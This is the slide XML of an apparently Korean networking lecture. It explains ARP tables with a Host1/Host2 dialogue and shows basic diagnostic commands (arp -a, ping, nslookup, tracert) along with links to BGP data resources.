              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>해당 공간 모두에게 외치는 것</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Host2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>네</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>! </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>제가 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>22.87.132.42</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>입니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>물리 주소는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>04-B3-BC-18-9A-11</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>입니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Host1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>=&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> 그때그때 물리적 주소를 물어보지 말고</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1"/>
              <a:t>적어놓자</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Host1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0"/>
              <a:t>ARP Table </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>: [ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2E75B6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Host2, 04-B3-BC-18-9A-11 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>추가</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="그림 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{21A9A01E-A3B5-4332-9B60-93A1C3B9221E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2192199" y="1902721"/>
            <a:ext cx="6666879" cy="1604061"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="397175489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ARP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>테이블</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B22EBE07-1F99-4EE2-A28E-1E204D27CAA0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1394903" y="2907335"/>
            <a:ext cx="4988090" cy="2813188"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{734094D8-EE9C-413E-884A-A7D29C7BE2A7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3203507" y="2256806"/>
            <a:ext cx="2439575" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
            <a:prstDash val="dash"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="373A3C"/>
                </a:solidFill>
                <a:latin typeface="Apple SD Gothic Neo"/>
              </a:rPr>
              <a:t>arp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="373A3C"/>
                </a:solidFill>
                <a:latin typeface="Apple SD Gothic Neo"/>
              </a:rPr>
              <a:t> -a</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="7030A0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BD3B1AB0-DB90-4BF3-8302-60EF8922CE4C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6894444" y="3863009"/>
            <a:ext cx="4459356" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>동적 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>: ARP reply </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>에 의 해 바뀔 수 있음</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>정적 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>사용자가 정한 값</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>고정</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="99970195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a:t>네트워크 구조 추적</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="화살표: 오른쪽 6">
            <a:hlinkClick r:id="" action="ppaction://noaction"/>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 action="ppaction://noaction"/>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C2D29C0A-931E-4457-99B8-E8C367D30B29}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="467137" y="2763196"/>
            <a:ext cx="3893521" cy="1883671"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="그림 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6548CDE2-EDA0-4093-9884-ECC9FDCDBEB6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4458287" y="2763196"/>
            <a:ext cx="2966243" cy="1038185"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC343611-888D-4094-98FD-13ADDA64400B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1538016" y="2144164"/>
            <a:ext cx="2249045" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
            <a:prstDash val="dash"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="373A3C"/>
                </a:solidFill>
                <a:latin typeface="Apple SD Gothic Neo"/>
              </a:rPr>
              <a:t>ping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="373A3C"/>
                </a:solidFill>
                <a:latin typeface="Apple SD Gothic Neo"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="373A3C"/>
                </a:solidFill>
                <a:latin typeface="Apple SD Gothic Neo"/>
              </a:rPr>
              <a:t>8.8.8.8</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="7030A0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3C183B34-CB6D-4529-ADF9-70D90F79DDC6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4770195" y="2144164"/>
            <a:ext cx="2451476" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
            <a:prstDash val="dash"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="373A3C"/>
                </a:solidFill>
                <a:latin typeface="Apple SD Gothic Neo"/>
              </a:rPr>
              <a:t>nslookup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="373A3C"/>
                </a:solidFill>
                <a:latin typeface="Apple SD Gothic Neo"/>
              </a:rPr>
              <a:t> 8.8.8.8</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="7030A0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="그림 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C869600D-BD36-46D2-BB14-A6A71FCA3154}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7522160" y="2763196"/>
            <a:ext cx="4341444" cy="2451534"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="TextBox 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C5ADB0CA-7177-4404-9841-BCDFD3BF95A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8404940" y="2144164"/>
            <a:ext cx="2451476" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
            <a:prstDash val="dash"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="373A3C"/>
                </a:solidFill>
                <a:latin typeface="Apple SD Gothic Neo"/>
              </a:rPr>
              <a:t>tracert 8.8.8.8</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="7030A0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35444774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4652B0E1-CB03-4BD0-A28F-C21D5514A84E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2122716" y="1765476"/>
            <a:ext cx="6684507" cy="9463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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC1D4C5B-2DB0-4BE7-8539-C660CB54CB5A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="970579" y="1854986"/>
            <a:ext cx="1028700" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>한겨레</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="그림 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C397274-3EFF-4DFC-A1C6-95F242B57130}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="970579" y="2472433"/>
            <a:ext cx="5447683" cy="3985457"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="그림 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7DC724BC-9CF7-4D15-8312-29A129827FDF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6311004" y="3058573"/>
            <a:ext cx="5337401" cy="2813176"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="131781669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실행 단추: 문서 10">
            <a:hlinkClick r:id="rId4" action="ppaction://hlinkfile"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A87003F-377E-45E5-98F2-AA7335F1F4FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="997299" y="1979578"/>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5AB709CD-6627-4EE0-88F3-83C172B18D98}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2584940" y="1812334"/>
            <a:ext cx="7022120" cy="4545793"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12">
            <a:hlinkClick r:id="rId6"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{23D94D94-2565-4FD6-B505-503FE0CA8383}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="351064" y="2865664"/>
            <a:ext cx="3788228" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>https://bgp.he.net</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="그림 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{484B80D6-2AA4-4F3C-900D-0DDF834075AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4231140" y="4665889"/>
            <a:ext cx="447675" cy="285750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="그림 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F3FC51D-6A72-4563-AF87-6C85B3B3D068}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3427639" y="4085230"/>
            <a:ext cx="438150" cy="238125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18" name="그림 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D63999B-0989-4F27-95CE-7F4DF7DB7B86}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5209494" y="5034643"/>
            <a:ext cx="466725" cy="266700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="175279681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 name="TextBox 12">
            <a:hlinkClick r:id="rId4"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{23D94D94-2565-4FD6-B505-503FE0CA8383}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="709321" y="1921912"/>
            <a:ext cx="4483165" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>http://archive.routeviews.org/bgpdata/</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4715934D-A3C0-49D9-8AC6-54DAC282AB02}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
